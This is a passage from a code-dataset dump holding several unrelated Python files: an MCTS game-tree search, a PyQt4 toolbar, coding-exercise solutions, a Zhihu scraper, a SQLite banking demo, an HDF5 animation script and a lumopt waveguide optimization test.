uct=self.calc_uct(w=0,N=0,t=t),\n terminal=False, # all nodes are initially terminal \n leads_to_terminal=False,\n N_children=0,\n N_leads_to_terminal_child_edges=0,\n leaf=True,\n depth=current_depth+1,\n parents=[node],\n N_parents=1,\n current_player=int(child[0]))\n self.g.add_edge(u_of_edge=node,\n v_of_edge=child,\n leads_to_terminal=False,\n action=action)\n leafs.append(child)\n # note that there might be elements in opts that do not get here.\n # so children is not just len(opts)\n children += 1\n \n self.g.nodes[node]['N_children']=children\n\n if children==0:\n self.g.nodes[node]['terminal']=True\n self.g.nodes[node]['leaf'] = True\n return None\n else:\n # it has children\n if len(leafs)>0:\n # and at least one leaf\n self.g.nodes[node]['leaf'] = False\n if return_random:\n return random.choice(leafs) \n else:\n return None\n else:\n # it has children but no leafs (all edges are going back to the tree itself)\n self.g.nodes[node]['leaf'] = False\n return None\n \n\n def select(self,node=None, return_path=[]):\n \"\"\" node must not be terminal.\n assumes a given tree.\n \"\"\"\n if not node:\n node = self.root\n return_path.append(node)\n if self.g.nodes[node][\"terminal\"]:\n return None, return_path\n if self.g.nodes[node][\"leaf\"]:\n return node, return_path\n next_nodes = [e[1] for e in self.g.out_edges(nbunch=node) if not self.g.edges[e][\"leads_to_terminal\"]]\n next_wghts = np.array([self.get_weight(reward=self.g.nodes[n]['rewards'][self.optimizing_player-1],\n N=self.g.nodes[n]['N'])\n for n in next_nodes])\n # np.array([self.g.nodes[n]['rewards'][self.optimizing_player-1]/self.g.nodes[n]['N'] + self.exploration_epsilon for n in next_nodes]) ** self.biasedness\n next_node = random.choices(next_nodes, weights=next_wghts, k=1)[0]\n return self.select(node=next_node, return_path=return_path)\n\n\n def rollout(self, edge, limit_no_actions=0):\n self.game.initialize_from_state(state_hash=edge[0])\n _, _, game_over, _ = self.game.step(action=self.g.edges[edge]['action'])\n if game_over:\n self.g.nodes[edge[1]]['terminal']=True\n self.g.edges[edge]['leads_to_terminal']=True\n self.g.nodes[edge[0]]['N_leads_to_terminal_child_edges'] += 1\n self.propagate_leads_to_terminal(node=edge[0])\n return np.array(tweeze_rewards(self.game.rewards))\n else:\n while not game_over:\n opts = self.game.options()\n chos = random.choice([o for o in opts])\n _, _, game_over, _ = self.game.step(action=opts[chos])\n return np.array(tweeze_rewards(self.game.rewards))\n \n\n def create_tree(self, max_iter=100, verbose=False):\n if verbose:\n for i in range(max_iter):\n if isinstance(verbose,int):\n node, rewards = self.iteration(verbose=False)\n if i % verbose == 0:\n print(i, node, rewards)\n else:\n node, rewards = self.iteration(verbose=verbose)\n print(i, node, rewards)\n else:\n for i in range(max_iter):\n node, rewards = self.iteration(verbose=False)\n\n\n def iteration(self, verbose=False):\n if verbose:\n print('select node')\n # try:\n leaf_node, path = self.select(return_path=[]) # selects any leaf node\n # except Exception as e:\n # print(e)\n # return self\n if not leaf_node:\n if verbose:\n print('leaf node is none??')\n return None, None\n if verbose:\n print('leaf node is ', leaf_node)\n # try:\n # Check whether leaf_node is terminal \n if len(path)>1:\n rewards = self.rollout(edge=(path[-2],leaf_node))\n self.backpropagate(return_path=path, rewards=rewards, including_multiple_paths=True)\n if self.g.nodes[leaf_node][\"terminal\"]:\n return leaf_node, rewards\n sel_node = self.expand(node=leaf_node, return_random=True) # expands the graph \n # except Exception as e:\n # print(e)\n # return self\n if not sel_node:\n if verbose:\n print('no node selected')\n return leaf_node, None\n else:\n if verbose:\n print('node selected')\n \n\n path.append(sel_node)\n if verbose:\n print(path)\n print('rollout')\n # try:\n rewards = self.rollout(edge=(leaf_node,sel_node))\n # except Exception as e:\n # print(e)\n # return self\n if verbose:\n print('backpropagate')\n try:\n self.backpropagate(return_path=path, rewards=rewards, including_multiple_paths=True)\n except Exception as e:\n print(e)\n return self\n if verbose:\n print('return')\n return sel_node, rewards\n \n\n def backpropagate(self, return_path, rewards, including_multiple_paths=False):\n if not including_multiple_paths:\n for node in reversed(return_path):\n # increment the reward to each node including the selected node\n new_rewards = np.add(self.g.nodes[node][\"rewards\"], rewards) \n self.g.nodes[node][\"rewards\"] = new_rewards\n self.g.nodes[node][\"main_player_reward\"] = new_rewards[self.optimizing_player-1]\n # increment the number of rollouts for that path.\n self.g.nodes[node][\"N\"] += 1\n else:\n node = return_path[-1] \n self.backpropagate_multiple_paths(node=node,\n rewards=rewards,\n return_path=return_path,\n on_path=len(return_path)-1)\n \n\n def backpropagate_multiple_paths(self, node, rewards, return_path, on_path):\n new_rewards = np.add(self.g.nodes[node][\"rewards\"], rewards) \n self.g.nodes[node][\"rewards\"] = new_rewards\n self.g.nodes[node][\"main_player_reward\"] = new_rewards[self.optimizing_player - 1]\n self.g.nodes[node][\"N\"] += 1\n parents = self.g.nodes[node]['parents']\n if len(parents)==0 or on_path==0:\n return None\n for parent in parents:\n if on_path is None:\n # node is not on return path, but parent might be\n if parent not in return_path:\n # parent doesnt lie in return path\n self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=None)\n else:\n # parent lies in return path\n # do not call the backpropagate_multiple here!!!\n pass\n else:\n index = on_path - 1\n if parent == return_path[index]:\n # parent lies on return path\n self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=index)\n else:\n # parent doesnt lie on return path\n self.backpropagate_multiple_paths(node=parent, rewards=rewards, return_path=return_path, on_path=None)\n\n\n def propagate_leads_to_terminal(self, node):\n condition = self.g.nodes[node]['N_children'] == self.g.nodes[node]['N_leads_to_terminal_child_edges']\n if condition:\n self.g.nodes[node][\"leads_to_terminal\"] = True\n for edge in self.g.in_edges(nbunch=node):\n self.g.edges[edge][\"leads_to_terminal\"] = True\n self.g.nodes[edge[0]]['N_leads_to_terminal_child_edges'] += 1\n self.propagate_leads_to_terminal(node=edge[0])\n\n\n\n def exists_path(self, source, target):\n try: \n path = nx.bidirectional_dijkstra(self.g, source, target)\n return True, path\n except:\n return False, []\n\n def calc_uct(self, w, N, t):\n return (w/(N+self.exploration_epsilon)) + self.exploration_coef * np.sqrt( np.log(t) / (N+self.exploration_epsilon))\n\n def get_weight(self, reward, N):\n pre_biased = self.exploration_epsilon\n if N!=0:\n pre_biased += reward / N\n return pre_biased ** self.biasedness\n\ndef tweeze_rewards(rewards):\n return [(r+1)/2 for r in rewards]\n\n\n \n# %%\n","repo_name":"leomarlo/GameTreeAnalysis","sub_path":"rl/MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":12645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"3511400141","text":"\n# -*- coding: utf-8 -*-\nfrom __future__ import print_function\n\n\"\"\"Sidebar for plugins. The sidebar comprises of actions.\nCurrently mode, connect and settings are defined.\n\"\"\"\n\n__author__ = \"Aviral Goel\"\n__credits__ = [\"Upi Lab\"]\n__license__ = \"GPL3\"\n__version__ = \"1.0.0\"\n__maintainer__ = \"Aviral Goel\"\n__email__ = \"goel.aviral@gmail.com\"\n__status__ = \"Development\"\n\n\nimport sys\nimport os\nimport SettingsDialog\nfrom PyQt4 import QtGui, Qt\nfrom PyQt4.QtGui import QDialog\nfrom PyQt4.QtGui import QHBoxLayout\nfrom PyQt4.QtGui import QPixmap\nfrom PyQt4.QtGui import QIcon\nfrom PyQt4.QtGui import QPushButton\nfrom PyQt4.QtGui import QAction\n\n\n\nICON_DIRECTORY = \"icons\"\nHAND_ICON_FILENAME = \"hand.png\"\nCONNECTOR_ICON_FILENAME = \"straight_connector_with_filled_circles.png\"\nWRENCH_ICON_FILENAME = \"wrench.png\"\nDELETE_GRAPH_ICON_FILENAME = \"add_graph.png\"\nADD_GRAPH_ICON_FILENAME = \"delete_graph.png\"\nLIST_ICON_FILENAME = \"list.png\"\n\n\ndef create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n ):\n pixmap = QPixmap(icon_path)\n icon = QIcon(pixmap)\n action = QAction(icon, text, parent)\n # action.setIcon(icon)\n # action.setIconText(text)\n action.triggered.connect(callback)\n action.setCheckable(checkable)\n action.setChecked(checked)\n return action\n\n\ndef mode_action( parent\n , callback = (lambda event: print(\"Mode Clicked!\"))\n , text = \"Mode\"\n , checkable = True\n , checked = True\n , icon_path = os.path.join( ICON_DIRECTORY\n , HAND_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\ndef add_graph_action( parent\n , callback = (lambda event: print(\"Add Graph Clicked!\"))\n , text = \"Add Graph\"\n , checkable = False\n , checked = False\n , icon_path = os.path.join( ICON_DIRECTORY\n , ADD_GRAPH_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\ndef delete_graph_action( parent\n , callback = (lambda event: print(\"Delete Graph Clicked!\"))\n , text = \"Delete Graph\"\n , checkable = False\n , checked = False\n , icon_path = os.path.join( ICON_DIRECTORY\n , DELETE_GRAPH_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\ndef list_action( parent\n , callback = (lambda event: print(\"List Clicked!\"))\n , text = \"Show List\"\n , checkable = False\n , checked = False\n , icon_path = os.path.join( ICON_DIRECTORY\n , LIST_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\ndef connector_action( parent\n , callback = (lambda event: print(\"Connector Clicked!\"))\n , text = \"Mode\"\n , checkable = True\n , checked = False\n , icon_path = os.path.join( ICON_DIRECTORY\n , CONNECTOR_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\ndef settings_action( parent\n , callback = (lambda event: print(\"Settings Clicked\"))\n , text = \"Mode\"\n , checkable = False\n , checked = False\n , icon_path = os.path.join( ICON_DIRECTORY\n , WRENCH_ICON_FILENAME\n )\n ):\n return create_action( parent\n , callback\n , text\n , checkable\n , checked\n , icon_path\n )\n\n\n # actions\n # , left_spacer = False\n # , right_spacer = False\n\ndef sidebar():\n return QtGui.QToolBar()\n # bar.setOrientation(Qt.Qt.Vertical)\n # return bar\n # if left_spacer:\n # left_spacer = QWidget()\n # left_spacer.setSizePolicy( QtGui.QSizePolicy.Expanding\n # , QtGui.QSizePolicy.Expanding\n # )\n # toolbar.addWidget(left_spacer)\n\n # for action in actions:\n # toolbar.addAction(action(toolbar))\n\n # if right_spacer:\n # right_spacer = QWidget()\n # right_spacer.setSizePolicy( QtGui.QSizePolicy.Expanding\n # , QtGui.QSizePolicy.Expanding\n # )\n # toolbar.addWidget(right_spacer)\n\n # return toolbar\n\n\n\n\n# def connect_action():\n\n# def settings_action():\n\n\n\ndef main():\n app = QtGui.QApplication(sys.argv)\n window = QtGui.QMainWindow()\n widget = SettingsDialog.SettingsWidget({\n 'LeakyIaF':['Vm'],\n 'Compartment':['Vm','Im'],\n 'HHChannel':['Ik','Gk'],\n 'ZombiePool':['n','conc'],\n 'ZombieBufPool':['n','conc'],\n 'HHChannel2D':['Ik','Gk'],\n 'CaConc':['Ca']\n })\n d = QDialog()\n l = QHBoxLayout()\n d.setLayout(l)\n l.addWidget(widget)\n bar = sidebar()\n bar.addAction(mode_action(bar))\n bar.addAction(connector_action(bar))\n bar.addAction(settings_action(bar, d.show))\n window.addToolBar(bar)\n window.show()\n sys.exit(app.exec_())\n\n\nif __name__ == \"__main__\":\n main()\n\n# # spacer widget for left\n# # spacer widget for right\n# # you can't add the same widget to both left and right. you need two different widgets.\n# right_spacer = QtGui.QWidget()\n# right_spacer.setSizePolicy(QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Expanding)\n\n# # here goes the left one\n# # toolbar.addWidget(left_spacer)\n# # some dummy actions\n\n\n\n# ################################################################################\n# # Hand Tool\n# ################################################################################\n\n\n\n\n\n","repo_name":"BhallaLab/moose","sub_path":"moose-gui/sidebar.py","file_name":"sidebar.py","file_ext":"py","file_size_in_byte":7723,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"3"} +{"seq_id":"29554715838","text":"'''\n최초시도\n\nfrom collections import deque\n\ndef bfs(graph,target,queue,depth):\n print(depth,\":\",queue)\n next_queue = deque() # 다음 depth의 큐\n \n while(queue): # 저번 depth에서 만들어진 queue, 즉 이번 level의 노드들을 모두 검사\n temp_word = queue.popleft()\n if temp_word == target: # 같으면 해당 level(depth), 즉 걸린 단계 수를 반환\n return depth\n else : # 다르면 일단 next_queue에 차곡차곡 집어넣는다\n next_queue.extend(graph[temp_word])\n \n return bfs(graph,target,next_queue,depth+1)\n \n\ndef solution(begin, target, words):\n if target not in words:\n return 0\n \n graph = {}\n \n for word in words :\n # 1개만 다른 단어는 다른 단어가 하나 뿐이므로 set으로 union시에 length가 3 + 1 = 4\n graph[word] = [i for i in words if len(set(word).union(set(i))) == 4] \n \n first_queue = deque([i for i in words if len(set(begin).union(set(i)))==4])\n \n answer = bfs(graph,target,first_queue,1)\n \n return answer\n\ntest case\nbegin = \"hit\"\ntarget = \"hhh\"\nwords = [\"hhh\",\"hht\"]\n실패.\n\nset시에 만약 단어내에 같은 글자가 있으면 4보다 줄어들수도 있다는 것을 간과했다.\n'''\n\n# 내가 만든 코드\nfrom collections import deque\n\ndef bfs(graph,target,queue,depth):\n next_queue = deque() # 다음 depth의 큐\n \n while(queue): # 저번 depth에서 만들어진 queue, 즉 이번 level의 노드들을 모두 검사\n temp_word = queue.popleft()\n if temp_word == target: # 같으면 해당 level(depth), 즉 걸린 단계 수를 반환\n return depth\n else : # 다르면 일단 next_queue에 차곡차곡 집어넣는다\n next_queue.extend(graph[temp_word])\n \n return bfs(graph,target,next_queue,depth+1) # 꼬리재귀 사용해 보았습니다.\n \n\ndef solution(begin, target, words):\n if target not in words:\n return 0\n \n words.insert(0,begin)\n \n graph = {}\n \n for one in words:\n adj = []\n for another in words:\n dif = 0\n for i in range(len(one)):\n if one[i] != another[i] :\n dif +=1\n if dif == 2: # 불필요한 연산을 줄이기 위해 2이상 차이나면 for문 탈출\n break;\n if dif == 1:\n adj.append(another)\n graph[one] = adj\n \n \n first_queue = deque(graph[begin])\n \n answer = bfs(graph,target,first_queue,1)\n \n return answer","repo_name":"SeongIkKim/ALtudy","sub_path":"Programers/03.DFS&BFS/word_transition.py","file_name":"word_transition.py","file_ext":"py","file_size_in_byte":2608,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"42290147093","text":"n = int(input())\n\ncheck = [0 for i in range(n+1)]\nnodes = []\n\nfor i in range(n-1):\n u,v = map(int,input().split())\n nodes.append((u,v))\n check[u]+=1\n check[v]+=1\n\nleft = 0; right = n-2\nfor u,v in nodes:\n if check[u]==1 or check[v]==1:\n print(left)\n left+=1\n else:\n print(right)\n right-=1\n","repo_name":"Shovon588/Programming","sub_path":"Codeforces with Python/1325C. Ehab and Path-etic MEXs.py","file_name":"1325C. Ehab and Path-etic MEXs.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"10722529032","text":"import json\ndef create():\n with open('t&p.json','r') as f1:\n r=json.load(f1)\n with open('t&p.json','w') as f:\n a1=int(input('enter your phone no'))\n a={\n 'name':input('enter your name '),\n 'email':input('enter ypur email'),\n 'password':input('enter your password')\n }\n r[a1]=a\n json.dump(r,f,indent=4)\ndef remove():\n with open('t&p.json','r') as f1:\n r=json.load(f1)\n with open('t&p.json','w') as f:\n m1=int(input('enter your phone no'))\n del r[str(m1)]\n json.dump(r,f,indent=4)\n\ndef read():\n m1=int(input('enter your phone number'))\n with open('t&p.json','r') as f:\n fo=json.load(f)\n for a,b in (fo.items()):\n if a==str(m1):\n print(b)\n return 1\n\nwhile True:\n print(\"\"\"\n press 1 for read\n press 2 for create\n press 3 for Update\n press 4 for delete\n press 5 for exit\n \"\"\")\n m=int(input())\n if m==1:\n #m1=int(input('enter your phone number '))\n read()\n elif m==2:\n #m1=int(input('enter your phome number '))\n create()\n elif m==3:\n a=read()\n if a==1:\n create()\n else:\n print('not exist')\n elif m==4:\n remove()\n elif m==5:\n break\n \n","repo_name":"PK2173/data","sub_path":"snake/gitup.py","file_name":"gitup.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"6308090997","text":"from hashlib import sha1\nfrom urllib.parse import urljoin\n\nimport re\n\nimport pickle\nimport redis\nimport requests\nimport zlib\nfrom bs4 import BeautifulSoup\n\n\ndef main():\n headers = {'user-agent': 'Baiduspider'}\n proxies = {'http': 'http://122.114.31.177:808'}\n join_url = urljoin('https://www.zhihu.com/', '/explore')\n get_url = requests.get(join_url, headers=headers, proxies=proxies)\n decode_html = get_url.content.decode('utf-8')\n soup_obj = BeautifulSoup(decode_html, 'lxml')\n href_regex = re.compile(r'^/question')\n a_tags = soup_obj.find_all('a', {'href': href_regex})\n base_hrefs = set()\n for a_tag in a_tags:\n all_href = a_tag.attrs['href']\n full_hrefs = urljoin('https://www.zhihu.com/', all_href)\n base_hrefs.add(full_hrefs)\n print(base_hrefs)\n redis_client = redis.Redis(host='47.98.173.29', port=6379, password=123456)\n # 将url处理成sha1摘要\n hashe_proto = sha1()\n # 传入url生成sha1摘要\n hasher = hashe_proto.copy()\n field_key = hasher.hexdigest()\n for base_href in base_hrefs:\n hasher.update(base_href.encode('utf-8'))\n print(base_href)\n if not redis_client.hexists('zhihu', field_key):\n html_page = requests.get(base_href, headers=headers).text\n zipped_page = zlib.compress(pickle.dumps(html_page))\n redis_client.hset('zhihu', field_key, zipped_page)\n print('Total %d question pages found.' % redis_client.hlen('zhihu'))\n\n\nif __name__ == '__main__':\n main()\n\n\n# hash.digest()\n# 返回摘要,作为二进制数据字符串值\n# hash.hexdigest()\n# 返回摘要,作为十六进制数据字符串值\n","repo_name":"judong-520/net_spider","sub_path":"practice/work07.py","file_name":"work07.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"15894333634","text":"import random\nfrom .luhnAlgo import Luhn\nimport sqlite3\n\n\nclass BankAccount:\n \"\"\"\n DocString\n \"\"\"\n\n def __init__(self,\n cardNumber=None,\n pin=None,\n balance=0):\n self.ID = None\n self.cardNumber = cardNumber\n self.pin = pin\n self.balance = balance\n\n def createAccount(self):\n IIN = str(400000)\n self.ID = str(random.randint(000000000, 999999999))\n AccountNumber = IIN + \"0\" * (9 - len(self.ID)) + self.ID\n\n self.cardNumber = Luhn().create(accountNumber=AccountNumber)\n tempPIN = str(random.randint(0000, 9999))\n self.pin = \"0\" * (4 - len(tempPIN)) + tempPIN\n return self.ID, self.cardNumber, self.pin\n\n def __repr__(self):\n return f\"Bank Account ID: {self.ID}\\n\" \\\n f\"Bank Account number: {self.cardNumber}\\n\" \\\n f\"Pin Number: {self.pin}\\n\" \\\n f\"Balance: {self.balance}\"\n\n\nclass Menu:\n \"\"\"\n Show the main menu of the Banking System\n \"\"\"\n\n def __init__(self):\n self._choice = '0'\n\n def __repr__(self):\n return f\"Current choice: {self._choice}\"\n\n def __eq__(self, other):\n return True if self._choice == other else False\n\n @staticmethod\n def _show_main_menu():\n print('1. Create an account')\n print('2. Log into account')\n print('0. Exit')\n\n @staticmethod\n def _show_account_menu():\n print(\"1. Balance\")\n print('2. Add income')\n print('3. Do transfer')\n print('4. Close account')\n print('5. Log out')\n print('0. Exit')\n\n def show_and_get_choice(self):\n if self._choice.startswith('2'):\n self._show_account_menu()\n self._choice = f'{self._choice[0]}.{input()}'\n else:\n self._show_main_menu()\n self._choice = input()\n\n def back_to_main(self):\n self._choice = '0'\n\n\nclass Database:\n \"\"\"\n SQLite Database Operation object\n\n --------\n Method:\n\n * add(self, account): add new account to database\n * get(self, cardNumber): get the account details from database by it's cardNumber\n * close(self, number): DELETE the cardNumber record in database\n * updateBalance(self, number, balance): UPDATE the account balance in database\n \"\"\"\n\n def __init__(self):\n self.conn = sqlite3.connect('card.s3db')\n self.cursor = self.conn.cursor()\n try:\n self.cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS card\n (id INTEGER, number TEXT, pin TEXT, balance INTEGER DEFAULT 0)\n \"\"\")\n except sqlite3.OperationalError:\n pass\n\n def add(self, account):\n self.cursor.execute(\n f\"INSERT INTO card VALUES ({account.ID}, {account.cardNumber}, \\\n {account.pin}, {account.balance})\")\n self.conn.commit()\n\n def get(self, cardNumber):\n acc = self.cursor.execute(\n f\"SELECT * FROM card WHERE number={cardNumber}\").fetchone()\n if acc:\n account = BankAccount()\n account.ID, account.cardNumber, account.pin, account.balance = acc\n return account\n return None\n\n def close(self, number):\n self.cursor.execute(f\"DELETE FROM card WHERE number = {number}\")\n self.conn.commit()\n\n def updateBalance(self, number, balance):\n self.cursor.execute(\n f\"UPDATE card SET balance = {balance} WHERE number = {number}\")\n self.conn.commit()\n\n\nclass BankingSystem:\n \"\"\"\n Simple Banking System\n \"\"\"\n\n def __init__(self):\n self.menu = Menu()\n self.db = Database()\n self.current_account = None\n\n def createAccount(self):\n account = BankAccount()\n account.createAccount()\n self.db.add(account=account)\n print('\\nYour card has been created')\n print('Your card number:')\n print(f'{account.cardNumber}')\n print('Your card PIN:')\n print(f'{account.pin}\\n')\n\n def login(self):\n print(\"\\nEnter your card number:\")\n number = input()\n print('Enter your PIN:')\n pin = input()\n account = self.db.get(cardNumber=number)\n if account:\n if account.pin == pin:\n print('\\nYou have successfully logged in!\\n')\n self.current_account = account\n return\n print('\\nWrong card number or PIN!\\n')\n self.menu.back_to_main()\n\n def showBalance(self):\n print(f\"\\nBalance: {self.current_account.balance}\\n\")\n\n def addIncome(self):\n print('\\nEnter income:')\n income = int(input())\n self.current_account.balance += income\n self.db.updateBalance(\n number=self.current_account.cardNumber,\n balance=self.current_account.balance)\n print('Income was added!\\n')\n\n def transfer(self):\n print('\\nTransfer\\nEnter card number:')\n number = input()\n if Luhn().validate(number):\n account = self.db.get(cardNumber=number)\n if account:\n print(\"Enter how much money you want to transfer:\")\n transfer = int(input())\n if self.current_account.balance >= transfer:\n self.db.updateBalance(\n number=number, balance=account.balance + transfer)\n print(\n f'>>> num: {self.current_account.cardNumber} bal: {self.current_account.balance}')\n self.current_account.balance -= transfer\n self.db.updateBalance(\n self.current_account.cardNumber,\n self.current_account.balance)\n print(\n f'>>> num: {self.current_account.cardNumber} bal: {self.current_account.balance}')\n print('Success!\\n')\n else:\n print('Not enough money!\\n')\n else:\n print('Such a card does not exist.\\n')\n else:\n print('Probably you made mistake in the card number. Please try again!\\n')\n\n def closeAccount(self):\n self.db.close(self.current_account.cardNumber)\n print('\\nThe account has been closed!\\n')\n\n def logOut(self):\n print('\\nYou have successfully logged out!\\n')\n self.menu.back_to_main()\n\n def main(self):\n while True:\n self.menu.show_and_get_choice()\n if self.menu == '1':\n self.createAccount()\n elif self.menu == '2':\n self.login()\n elif self.menu == '2.1':\n self.showBalance()\n elif self.menu == '2.2':\n self.addIncome()\n elif self.menu == '2.3':\n self.transfer()\n elif self.menu == '2.4':\n self.closeAccount()\n elif self.menu == '2.5':\n self.logOut()\n else:\n print('\\nBye!')\n break\n","repo_name":"JL1829/SimpleBankingSystem","sub_path":"src/bankingSystem.py","file_name":"bankingSystem.py","file_ext":"py","file_size_in_byte":7035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18777190653","text":"\"\"\"\n=================\nAn animated image\n=================\n\nThis example demonstrates how to animate an image.\n\"\"\"\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as animation\nimport h5py\nimport sys, traceback\n\n\n\nclass Visualize:\n def __init__(self, filename, timesteps):\n self.file= h5py.File(filename+\".hdf5\", \"r\")\n self.i = 0\n self.fig = plt.figure()\n self.im = plt.imshow(np.random.random((100,100)), animated=True)\n ani = animation.FuncAnimation(self.fig, self.updatefig, frames=timesteps - 2, interval=0, blit=True, repeat=False)\n plt.show(block=False)\n\n\n def updatefig(self,*args):\n try:\n self.im.set_array(self.file['test'+str(self.i)])\n self.i += 1\n print (self.file['wind'+str(self.i)][0])\n return self.im,\n except:\n input(\"Press Enter to continue...\")\n return\n\n\n","repo_name":"masenov/gas-drone-simulation","sub_path":"python/visualize.py","file_name":"visualize.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"41931187951","text":"#!/bin/python3\n# coding:utf-8\n\nfrom CFdef import *\n\ndef menu(): #menu principal\n\n choice = str()\n \n print(\"option : \")\n print(\"new | modify | delete | show | quit \\n\")\n choice = input(\"What to do ... : \")\n\n return choice\n\nprint(\"Welcome to the BMEC archive manager\\n\")\n\nwhile True: #boucle infinie\n\n choice = menu()\n\n if choice == \"new\":\n newSave()\n\n elif choice == \"modify\":\n modifySave()\n\n elif choice == \"delete\":\n delSave()\n\n elif choice == \"show\":\n showSaves()\n\n elif choice == \"quit\":\n quit()\n\n else:\n print(\"argument invalid ...\")\n\n continue","repo_name":"Neltarim/archiveManager","sub_path":"SaveConfig/manager.py","file_name":"manager.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"31793748096","text":"import sys\nsys.path.append(\".\")\nimport os\nimport numpy as np\n\nfrom qatools import *\n\nfrom lumopt.utilities.load_lumerical_scripts import load_from_lsf\nfrom lumopt.utilities.wavelengths import Wavelengths\nfrom lumopt.utilities.materials import Material\nfrom lumopt.geometries.polygon import FunctionDefinedPolygon\nfrom lumopt.figures_of_merit.modematch import ModeMatch\nfrom lumopt.optimizers.generic_optimizers import ScipyOptimizers\nfrom lumopt.optimization import Optimization\n\nclass TestOptimizationParallelPlateWaveguideTE(TestCase):\n \"\"\" \n Unit test for the Optimization class. It performs a sanity check that the optimizer converges using a\n simple a parallel plate waveguide filled by a dielectric. The waveguide has a gap that must be filled\n all the way by the polygon under optimization to maximize transmission.\n\n There are two independent methods in the code base to compute the gradient of the figure of merit:\n 1) using the permittivity derivatives calculated directly from meshing (use_deps == True) and\n 2) using the shape derivative approximation described in Owen Miller's thesis (use_deps == False).\n Both methods are tested here using exactly the same structure.\n \"\"\"\n\n file_dir = os.path.abspath(os.path.dirname(__file__))\n\n def setUp(self):\n # Base simulation script\n self.base_script = load_from_lsf(os.path.join(self.file_dir, 'optimization_parallel_plate_waveguide_TE_base.lsf'))\n # Simulation bandwidth \n self.wavelengths = Wavelengths(start = 1500e-9,\n stop = 1600e-9,\n points = 11)\n # Polygon defining a rectangle that can grow or shrink along the y-axis to fill the gap\n self.mesh_del = 10.0e-9; # must be kept in sych with self.base_script\n initial_points_y = np.array([0.01 * self.mesh_del, 1.75 * self.mesh_del])\n def wall(param = initial_points_y):\n assert param.size == 2, \"walls defined by two points.\"\n self.wg_gap = 10.0 * self.mesh_del # must be kept in synch\n points_x = 0.5 * np.array([-self.wg_gap, self.wg_gap, self.wg_gap, -self.wg_gap])\n points_y = np.array([-param[0], -param[1], param[1], param[0]])\n polygon_points = [(x, y) for x, y in zip(points_x, points_y)]\n return np.array(polygon_points)\n self.wg_width = 50.0 * self.mesh_del # must be kept in synch\n bounds = [(0.0, self.wg_width / 2.0)] * initial_points_y.size \n self.geometry = FunctionDefinedPolygon(func = wall, \n initial_params = initial_points_y, \n bounds = bounds,\n z = 0.0, # must be kept in synch\n depth = self.wg_width, # must be kept in synch\n eps_out = 1.0 ** 2, # must be kept in synch with\n eps_in = Material(base_epsilon = 4.0 ** 2, name = '', mesh_order = 1), # must be kept in sych with\n edge_precision = 50,\n dx = 1.0e-10)\n # Figure of merit\n self.fom = ModeMatch(monitor_name = 'fom', # must be kept in sych\n mode_number = 1, # must be kept in sych\n direction = 'Forward',\n multi_freq_src = True,\n target_T_fwd = lambda wl: np.ones(wl.size),\n norm_p = 1)\n # Scipy optimizer\n self.optimizer = ScipyOptimizers(max_iter = 5, \n method = 'L-BFGS-B',\n scaling_factor = 1.0e6,\n pgtol = 1.0e-5,\n ftol = 1.0e-12,\n target_fom = 0.0,\n scale_initial_gradient_to = None)\n\n def test_permittivity_derivatives_in_2D(self):\n print(\"2D optimization with permittivity derivatives (use_deps = True): \")\n opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','2D');\", \n wavelengths = self.wavelengths,\n fom = self.fom,\n geometry = self.geometry,\n optimizer = self.optimizer,\n use_var_fdtd = False,\n hide_fdtd_cad = True,\n use_deps = True,\n plot_history = False,\n store_all_simulations = False)\n fom, params = opt.run()\n self.assertGreaterEqual(fom, 0.99991)\n self.assertAlmostEqual(params[0], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n self.assertAlmostEqual(params[1], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n\n def test_permittivity_derivatives_in_3D(self):\n print(\"3D optimization with permittivity derivatives (use_deps = True): \")\n opt = Optimization(base_script = self.base_script + \"setnamed('FDTD','dimension','3D');\", \n wavelengths = self.wavelengths,\n fom = self.fom,\n geometry = self.geometry,\n optimizer = self.optimizer,\n hide_fdtd_cad = True,\n use_deps = True,\n plot_history = False,\n store_all_simulations = False)\n fom, params = opt.run()\n self.assertGreaterEqual(fom, 0.99991)\n self.assertAlmostEqual(params[0], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n self.assertAlmostEqual(params[1], self.wg_width / 2.0 * self.optimizer.scaling_factor)\n\n def test_shape_boundary_approximation_in_2D(self):\n print(\"2D optimization with shape boundary approximation (use_deps = False): \")\n self.geometry.bounds = [(0.0, self.wg_width / 2.0 - self.mesh_del)] * 